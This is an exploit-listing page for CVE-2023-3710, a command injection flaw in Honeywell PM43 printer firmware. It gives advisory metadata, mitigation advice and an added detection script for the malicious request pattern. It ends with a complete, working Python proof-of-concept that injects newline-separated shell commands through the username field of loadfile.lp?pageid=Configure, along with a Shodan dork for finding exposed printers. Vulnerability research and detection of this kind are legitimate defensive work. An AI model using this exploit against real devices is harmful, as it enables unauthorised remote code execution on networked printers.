Honeywell PM43 Command Injection Remote Code Execution (RCE) - exploit.company
Vendor: PM43 Printers
By: ByteHunter
CVSS: 8.1 (CRITICAL)
Type: Remote Code Execution (RCE)
CWE: 78
Product Name: PM43 Printers
Affected Version From: Prior to P10.19.050004
Affected Version To: Not specified
Patch Exists: YES
Related CWE: CVE-2023-3710
CPE: h:honeywell:pm43_firmware
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

Honeywell PM43 Command Injection Remote Code Execution (RCE)

The exploit allows an attacker to remotely execute arbitrary code on Honeywell PM43 printers with firmware versions prior to P10.19.050004. By sending a crafted payload to the 'loadfile.lp?pageid=Configure' endpoint, an attacker can inject malicious commands. This vulnerability is identified as CVE-2023-3710.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to version P10.19.050004 or later. Additionally, restrict network access to the printer and avoid exposing it directly to the internet.
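
A detection check for the request shape used by the PoC further down, added here as an example and not part of the original advisory or exploit: it flags POSTs to loadfile.lp?pageid=Configure whose username form field contains a line break. The function names and sample requests are constructed, and it assumes the method, URI and form body are available from a proxy or WAF log.

```python
# Added example: flag form posts to the PM43 Configure page whose username
# field carries CR/LF. All sample requests below are constructed.
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/loadfile.lp"      # endpoint named on this page
TARGET_PAGEID = "configure"       # compared case-insensitively (assumption)
LINE_BREAKS = ("\n", "\r")


def is_suspicious(method, request_uri, body):
    """True when a POST to loadfile.lp?pageid=Configure has a username
    value containing CR or LF after form decoding."""
    if method.upper() != "POST":
        return False
    parts = urlsplit(request_uri)
    if not parts.path.lower().endswith(TARGET_PATH):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    if TARGET_PAGEID not in [v.lower() for v in query.get("pageid", [])]:
        return False
    # parse_qs percent-decodes, so %0a/%0d and raw line breaks both show up.
    form = parse_qs(body, keep_blank_values=True)
    return any(ch in value
               for value in form.get("username", [])
               for ch in LINE_BREAKS)


def scan(requests_seen):
    """Return the indexes of suspicious (method, uri, body) records."""
    return [i for i, rec in enumerate(requests_seen) if is_suspicious(*rec)]


# Constructed records: (method, request URI, form body)
SAMPLE_REQUESTS = [
    ("POST", "/loadfile.lp?pageid=Configure",
     "username=itadmin&userpassword=example"),
    ("POST", "/loadfile.lp?pageid=Configure",
     "username=user%0APLACEHOLDER%0A&userpassword=example"),
    ("GET", "/loadfile.lp?pageid=Configure", ""),
    ("POST", "/loadfile.lp?pageid=Configure",
     "username=user\r\nPLACEHOLDER&userpassword=example"),
    ("POST", "/loadfile.lp?pageid=Status",
     "username=user%0APLACEHOLDER&userpassword=example"),
]

if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print("suspicious request:", SAMPLE_REQUESTS[i][:2])
```

The check is scoped to the one endpoint and field this page describes; a legitimate username never needs a line break, so any hit is worth reviewing.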

Exploit-DB raw data:

#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Firmware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710   
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter      
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text  
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()